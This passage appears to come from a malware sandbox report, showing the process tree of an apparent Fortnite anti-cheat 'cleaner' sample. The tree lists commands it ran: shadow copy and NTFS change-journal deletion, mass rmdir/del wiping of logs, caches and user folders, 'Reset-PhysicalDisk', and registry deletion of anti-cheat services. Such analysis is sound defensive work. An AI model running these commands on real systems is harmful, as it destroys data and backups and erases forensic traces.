  - - C:\Windows\IME\Cleaner.exe
      C:\Windows\IME\Cleaner.exe
      4⤵
      Drops startup file
      Executes dropped EXE
      Drops desktop.ini file(s)
      Drops file in System32 directory
      Enumerates system info in registry
      Modifies Internet Explorer settings
      Modifies registry class
      Suspicious use of AdjustPrivilegeToken
      PID:4452
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c fsutil usn deletejournal /d C:
        5⤵
        
        PID:5792
      - C:\Windows\system32\fsutil.exe
        
        fsutil usn deletejournal /d C:
        6⤵
        Deletes NTFS Change Journal
        
        PID:5808
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c fsutil usn deletejournal /d D:
        5⤵
        
        PID:1752
      - C:\Windows\system32\fsutil.exe
        
        fsutil usn deletejournal /d D:
        6⤵
        Deletes NTFS Change Journal
        Enumerates connected drives
        
        PID:5644
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c fsutil usn deletejournal /d E:
        5⤵
        
        PID:4416
      - C:\Windows\system32\fsutil.exe
        
        fsutil usn deletejournal /d E:
        6⤵
        Deletes NTFS Change Journal
        
        PID:336
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c vssadmin delete shadows /All /Quiet
        5⤵
        
        PID:4680
      - C:\Windows\system32\vssadmin.exe
        
        vssadmin delete shadows /All /Quiet
        6⤵
        Interacts with shadow copies
        
        PID:6000
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c net stop winmgmt /Y
        5⤵
        
        PID:5936
      - C:\Windows\system32\net.exe
        
        net stop winmgmt /Y
        6⤵
        
        PID:5080
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop winmgmt /Y
        7⤵
        
        PID:1704
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c cls
    3⤵
    PID:3548
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c C:\Windows\IME\mac.exe
    3⤵
    PID:5840
  - - C:\Windows\IME\mac.exe
      C:\Windows\IME\mac.exe
      4⤵
      PID:5028
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C rmdir /s /q %systemdrive%\Users\%username%\AppData\Local\Microsoft\Windows\WebCache
    3⤵
    PID:4172
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C rmdir /s /q %systemdrive%\Users\%username%\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
    3⤵
    PID:2364
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C rmdir /s /q %systemdrive%\Users\%username%\AppData\Local\ConnectedDevicesPlatform\L.%username%\ActivitiesCache.db-wal
    3⤵
    PID:4676
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C rmdir /s /q %systemdrive%\ProgramData\USOShared\Logs\User
    3⤵
    PID:1624
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C @del /s /f /q %systemdrive%\Users\%username%\AppData\Local\D3DSCache
    3⤵
    PID:1436
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C rmdir /s /q %systemdrive%\Windows\ServiceProfiles\LocalService\AppData\Local\ConnectedDevicesPlatform\CDPGlobalSettings.cdp
    3⤵
    PID:3480
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C rmdir /s /q %systemdrive%\Users\%username%\AppData\Local\cache\qtshadercache
    3⤵
    PID:4380
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C @del /s /f /q %systemdrive%\Users\%username%\AppData\Local\Microsoft\Windows\UsrClass.dat.log2
    3⤵
    PID:5952
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C rmdir /s /q %systemdrive%\Users\%username%\AppData\Local\AMD\VkCache
    3⤵
    PID:4136
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C rmdir /s /q %systemdrive%\Users\%username%\AppData\Local\AMD\CN\NewsFeed
    3⤵
    PID:6068
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C rmdir /s /q %systemdrive%\Users\%username%\AppData\Local\Microsoft\Windows\INetCache\IE\RHKRUA8J
    3⤵
    PID:1704
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C rmdir /s /q %systemdrive%\Users\%username%\AppData\Local\Microsoft\CLR_v4.0\UsageLogs
    3⤵
    PID:5480
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C rmdir /s /q %systemdrive%\Windows\Temp
    3⤵
    PID:5528
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C rmdir /s /q %systemdrive%\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp
    3⤵
    PID:6024
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C rd /q /s C:\$Recycle.Bin >nul 2>&1
    3⤵
    PID:5440
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C rmdir /s /q %systemdrive%\Windows\servicing\InboxFodMetadataCache
    3⤵
    PID:2932
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C rmdir /s /q %systemdrive%\Users\%username%\AppData\Roaming\Microsoft\Windows\CloudStore
    3⤵
    PID:3396
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C rmdir /s /q %systemdrive%\Users\%username%\AppData\Local\FortniteGame\Saved
    3⤵
    PID:2428
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C rmdir /s /q %systemdrive%\Users\%username%\AppData\Local\Microsoft\Windows\Explorer\IconCacheToDelete
    3⤵
    PID:6056
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C rmdir /s /q %systemdrive%\Windows\INF
    3⤵
    PID:5288
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C rmdir /s /q %systemdrive%\ProgramData\%username%\Microsoft\XboxLive\NSALCache
    3⤵
    PID:3704
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C rmdir /s /q %systemdrive%\Windows\Prefetch
    3⤵
    PID:3148
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C rmdir /s /q %systemdrive%\Users\%username%\AppData\Local\D3DSCache
    3⤵
    PID:2888
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C rmdir /s /q %systemdrive%\Users\%username%\AppData\Local\CrashReportClient
    3⤵
    PID:2428
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C rmdir /s /q %systemdrive%\Windows\temp
    3⤵
    PID:4484
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C rmdir /s /q %systemdrive%\Windows\Logs
    3⤵
    PID:2700
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C rmdir /s /q %systemdrive%\Users\%username%\AppData\Local\Microsoft\Windows\SettingSync\metastore
    3⤵
    PID:3952
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C rmdir /s /q %systemdrive%\Windows\SoftwareDistribution\DataStore\Logs
    3⤵
    PID:4524
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C rmdir /s /q %systemdrive%\ProgramData\Microsoft\Windows\WER\Temp
    3⤵
    PID:4828
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C rmdir /s /q %systemdrive%\Users\%username%\AppData\Local\AMD\DxCache
    3⤵
    PID:2296
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C rmdir /s /q %systemdrive%\Windows\Prefetch
    3⤵
    PID:4852
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C rmdir /s /q %systemdrive%\ProgramData\USOShared\Logs
    3⤵
    PID:2936
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:6000
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C @del /s /f /a:h /a:a /q %systemdrive%\Users\%username%\AppData\Local\Microsoft\Windows\WebCache\*.*
    3⤵
    PID:2364
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C rmdir /s /q "%systemdrive%\Program Files\Epic Games\Fortnite\Engine\Plugins
    3⤵
    PID:4732
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C rmdir /s /q "%systemdrive%\Program Files\Epic Games\Fortnite\FortniteGame\Plugins
    3⤵
    PID:4524
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:2872
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C rmdir /s /q "%systemdrive%\Program Files\Epic Games\Fortnite\FortniteGame\PersistentDownloadDir
    3⤵
    PID:3964
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C rmdir /s /q "%systemdrive%\Users\%username%\AppData\Local\NVIDIA Corporation
    3⤵
    PID:3372
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C rmdir /s /q %systemdrive%\Users\%username%\AppData\Roaming\EasyAntiCheat
    3⤵
    PID:5792
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C del /f /s /q %systemdrive%\ProgramData\Microsoft\DataMart\PaidWiFi\NetworksCache
    3⤵
    PID:828
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C del /f /s /q %systemdrive%\ProgramData\Microsoft\DataMart\PaidWiFi\Rules
    3⤵
    PID:1364
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C rmdir /s /q %systemdrive%\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\DeliveryOptimization\Cache
    3⤵
    PID:840
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C rmdir / s / q %systemdrive%\Users\%username%\AppData\Local\Temp
    3⤵
    PID:5932
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:5396
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C rmdir /s /q %systemdrive%\Users\%username%\AppData\Roaming\Microsoft\Windows\CloudStore
    3⤵
    PID:1216
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C rmdir /s /q %systemdrive%\Users\%username%\AppData\Local\FortniteGame\Saved
    3⤵
    PID:5528
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C rmdir /s /q %systemdrive%\Windows\INF
    3⤵
    PID:6024
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C rmdir /s /q %systemdrive%\ProgramData\%username%\Microsoft\XboxLive
    3⤵
    PID:4536
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C rmdir /s /q %systemdrive%\Users\Public\Documents
    3⤵
    PID:968
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C rmdir /s /q %systemdrive%\Windows\Prefetch
    3⤵
    PID:4484
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C rmdir /s /q %systemdrive%\Users\%username%\AppData\Local\D3DSCache
    3⤵
    PID:2936
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C rmdir /s /q %systemdrive%\Users\%username%\AppData\Local\CrashReportClient
    3⤵
    PID:3824
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C rmdir /s /q %systemdrive%\Windows\temp
    3⤵
    PID:6080
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C rmdir /s /q %systemdrive%\Users\%username%\AppData\Local\Microsoft\Windows\SettingSync\metastore
    3⤵
    PID:6068
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C rmdir /s /q %systemdrive%\Windows\SoftwareDistribution\DataStore\Logs
    3⤵
    PID:4584
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C rmdir /s /q %systemdrive%\ProgramData\Microsoft\Windows\WER\Temp
    3⤵
    PID:5544
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C rmdir /s /q %systemdrive%\Users\%username%\AppData\Local\AMD\DxCache
    3⤵
    PID:3148
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C rmdir /s /q %systemdrive%\Users\%username%\AppData\Local\NVIDIA Corporation
    3⤵
    PID:1664
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C rmdir /s /q %systemdrive%\Windows\Prefetch
    3⤵
    PID:4832
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C @del /s /f /a:h / a:a /q %systemdrive%\Users\username%\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\*.*
    3⤵
    PID:164
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C @del /s /f /a:h / a:a /q %systemdrive%\Users\%username%\AppData\Local\Microsoft\Windows\WebCache\*.*
    3⤵
    PID:2832
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C @del /s /f /a:h / a:a /q %systemdrive%\Users\%username%\AppData\Local\Microsoft\XboxLive\*.*
    3⤵
    PID:4856
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:6024
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C rmdir /s /q %systemdrive%\Users\%username%\AppData\Local\Packages\Microsoft.XboxGamingOverlay_8wekyb3d8bbwe\AC
    3⤵
    PID:3240
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C rmdir /s /q %systemdrive%\Users\%username%\AppData\Local\Packages\Microsoft.XboxGamingOverlay_8wekyb3d8bbwe\LocalCache
    3⤵
    PID:4852
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C rmdir /s /q %systemdrive%\Users\%username%\AppData\Local\Packages\Microsoft.XboxGamingOverlay_8wekyb3d8bbwe\Settings
    3⤵
    PID:3936
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C rmdir /s /q "%systemdrive%\Program Files\Epic Games\Fortnite\Engine\Plugins
    3⤵
    PID:216
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C rmdir /s /q "%systemdrive%\Program Files\Epic Games\Fortnite\FortniteGame\Plugins
    3⤵
    PID:1388
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C rmdir /s /q "%systemdrive%\Program Files\Epic Games\Fortnite\FortniteGame\PersistentDownloadDir
    3⤵
    PID:5548
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C rmdir /s /q "%systemdrive%\Program Files\Epic Games\Fortnite\FortniteGame\Config
    3⤵
    PID:2860
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C rmdir /s /q "%systemdrive%\Users\%username%\AppData\Local\NVIDIA Corporation
    3⤵
    PID:4608
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C rmdir /s /q %systemdrive%\Users\%username%\AppData\Roaming\EasyAntiCheat
    3⤵
    PID:1364
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:5068
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C del /f /s /q %systemdrive%\ProgramData\Microsoft\DataMart\PaidWiFi\NetworksCache
    3⤵
    PID:6076
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C del /f /s /q %systemdrive%\ProgramData\Microsoft\DataMart\PaidWiFi\Rules
    3⤵
    PID:3604
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C rmdir /s /q %systemdrive%\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\DeliveryOptimization\Cache
    3⤵
    PID:5808
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C rmdir /s /q %systemdrive%\Users\%username%\AppData\Local\Temp
    3⤵
    PID:4408
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C rmdir /s /q %systemdrive%\Users\%username%\AppData\Local\Microsoft\Windows\INetCache
    3⤵
    PID:5644
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:4736
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C rmdir /s /q %systemdrive%\Users\%username%\AppData\Local\Microsoft\Windows\INetCookies
    3⤵
    PID:1544
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C rmdir /s /q %systemdrive%\Users\%username%\AppData\Local\Microsoft\Windows\IEDownloadHistory
    3⤵
    PID:5932
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C rmdir /s /q %systemdrive%\Users\%username%\AppData\Local\Microsoft\Windows\IECompatUaCache
    3⤵
    PID:5504
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C rmdir /s /q %systemdrive%\Users\%username%\AppData\Local\Microsoft\Windows\IECompatCache
    3⤵
    PID:5080
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C rmdir /s /q %systemdrive%\Users\%username%\AppData\Local\Microsoft\Windows\INetCookies\DNTException
    3⤵
    PID:636
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C rmdir /s /q %systemdrive%\Users\%username%\AppData\Local\Microsoft\Windows\INetCookies\PrivacIE
    3⤵
    PID:1512
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C rmdir /s /q %systemdrive%\Users\%username%\AppData\Local\Microsoft\Windows\History
    3⤵
    PID:2932
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C rmdir /s /q %systemdrive%\Users\%username%\AppData\Local\Microsoft\Windows\History\Low
    3⤵
    PID:5912
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C rmdir /s /q %systemdrive%\Users\%username%\Intel
    3⤵
    PID:3240
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C rmdir /s /q %systemdrive%\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData
    3⤵
    PID:4536
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C rmdir /s /q "%systemdrive%\Users\%username%\AppData\Local\Microsoft\Feeds Cache
    3⤵
    PID:1652
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:4956
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C rmdir /s /q %systemdrive%\Users\%username%\AppData\Local\Microsoft\Feeds Cache
    3⤵
    PID:2760
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C rmdir /s /q %systemdrive%\Users\%username%\AppData\Local\EpicGamesLauncher
    3⤵
    PID:216
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C rmdir /s /q %systemdrive%\Users\%username%\AppData\Local\UnrealEngine
    3⤵
    PID:1692
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C rmdir /s /q %systemdrive%\Users\%username%\AppData\Local\UnrealEngineLauncher
    3⤵
    PID:2860
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C rmdir /s /q %systemdrive%\Users\%username%\AppData\Local\AMD
    3⤵
    PID:5904
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C rmdir /s /q %systemdrive%\Users\%username%\AppData\Local\INTEL
    3⤵
    PID:5752
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C rmdir /s /q %systemdrive%\Users\%username%\ntuser.ini
    3⤵
    PID:5184
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C rmdir /s /q %systemdrive%\Users\%username%\AppData\LocalLow\Microsoft\CryptnetUrlCache
    3⤵
    PID:1968
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C rmdir /s /q "%systemdrive%\System Volume Information\IndexerVolumeGuid
    3⤵
    PID:4468
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C rmdir /s /q %systemdrive%\Users\%username%\AppData\Local\Microsoft\CLR_v4.0
    3⤵
    PID:164
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C rmdir /s /q %systemdrive%\Users\%username%\AppData\Local\Microsoft\CLR_v3.0
    3⤵
    PID:5476
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C rmdir /s /q "%systemdrive%\Users\%username%\AppData\Local\Microsoft\Internet Explorer\Recovery
    3⤵
    PID:3964
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:4320
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C @del /s /f /q %systemdrive%\Users\%username%\AppData\Local\Microsoft\Feeds
    3⤵
    PID:3948
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C @del /s /f /q %systemdrive%\Windows\System32\restore\MachineGuid.txt
    3⤵
    PID:4336
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C @del /s /f /q %systemdrive%\ProgramData\Microsoft\Windows\WER
    3⤵
    PID:4852
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C @del /s /f /q %systemdrive%\Users\Public\Libraries
    3⤵
    PID:3844
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C @del /s /f /q %systemdrive%\MSOCache
    3⤵
    PID:2936
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:336
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C rmdir /s /q %systemdrive%\Users\%username%\AppData\Roaming\Microsoft\Windows\CloudStore
    3⤵
    PID:5284
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C rmdir /s /q %systemdrive%\Users\%username%\AppData\Local\Microsoft\Windows\WebCache
    3⤵
    PID:1436
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:2364
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C rmdir /s /q %systemdrive%\Users\%username%\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
    3⤵
    PID:1448
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C rmdir /s /q %systemdrive%\Users\%username%\AppData\Local\ConnectedDevicesPlatform\L.%username%\ActivitiesCache.db-wal
    3⤵
    PID:5168
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C rmdir /s /q %systemdrive%\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData
    3⤵
    PID:3148
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C rmdir /s /q %systemdrive%\Windows\SoftwareDistribution\DataStore\Logs
    3⤵
    PID:4136
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C rmdir /s /q %systemdrive%\ProgramData\USOShared\Logs\User
    3⤵
    PID:5476
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C @del /s /f /q %systemdrive%\Users\%username%\AppData\Local\D3DSCache
    3⤵
    PID:5952
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C rmdir /s /q %systemdrive%\Windows\ServiceProfiles\LocalService\AppData\Local\ConnectedDevicesPlatform\CDPGlobalSettings.cdp
    3⤵
    PID:3000
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C rmdir /s /q %systemdrive%\Users\%username%\AppData\Local\cache\qtshadercache
    3⤵
    PID:2384
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C @del /s /f /q %systemdrive%\Users\%username%\AppData\Local\Microsoft\Windows\UsrClass.dat.log2
    3⤵
    PID:3728
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C rmdir /s /q %systemdrive%\Users\%username%\AppData\Local\AMD\VkCache
    3⤵
    PID:4608
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:5608
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C rmdir /s /q %systemdrive%\Users\%username%\AppData\Local\AMD\CN\NewsFeed
    3⤵
    PID:2008
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:1664
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C rmdir /s /q %systemdrive%\Users\%username%\AppData\Local\Microsoft\CLR_v4.0\UsageLogs
    3⤵
    PID:4828
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C rmdir /s /q %systemdrive%\Windows\Temp
    3⤵
    PID:5324
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:4136
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C rmdir /s /q %systemdrive%\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp
    3⤵
    PID:528
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C rmdir /s /q %systemdrive%\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\DeliveryOptimization\Cache
    3⤵
    PID:5684
- C:\Users\Admin\AppData\Local\Temp\nExOs.exe
  "C:\Users\Admin\AppData\Local\Temp\nExOs.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:876
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:5044
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im EpicGamesLauncher.exe
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:636
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping.exe >nul 2>&1
    3⤵
    - System Network Configuration Discovery: Internet Connection Discovery
    - Suspicious use of WriteProcessMemory
    PID:1160
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im FortniteClient-Win64-Shipping.exe
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:4884
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c taskkill /f /im OneDrive.exe >nul 2>&1
    3⤵
    PID:1620
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im OneDrive.exe
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:2420
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c color b
    3⤵
    PID:3176
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c color 4
    3⤵
    PID:2548
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c powershell.exe Reset-PhysicalDisk * >nul 2>&1
    3⤵
    PID:308
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe Reset-PhysicalDisk *
      4⤵
      Command and Scripting Interpreter: PowerShell
      PID:5408
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg delete HKLM\SOFTWARE\WOW6432Node\EasyAntiCheat /f
    3⤵
    PID:6024
  - - C:\Windows\system32\reg.exe
      reg delete HKLM\SOFTWARE\WOW6432Node\EasyAntiCheat /f
      4⤵
      PID:2888
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg delete HKLM\SYSTEM\ControlSet001\Services\EasyAntiCheat /f
    3⤵
    PID:3844
  - - C:\Windows\system32\reg.exe
      reg delete HKLM\SYSTEM\ControlSet001\Services\EasyAntiCheat /f
      4⤵
      PID:4736
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg delete HKLM\SYSTEM\ControlSet001\Services\BEService /f
    3⤵
    PID:4176
  - - C:\Windows\system32\reg.exe
      reg delete HKLM\SYSTEM\ControlSet001\Services\BEService /f
      4⤵
      PID:2964
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg delete HKLM\System\CurrentControlSet\Control\TimeZoneInformation /f
    3⤵
    PID:5752
  - - C:\Windows\system32\reg.exe
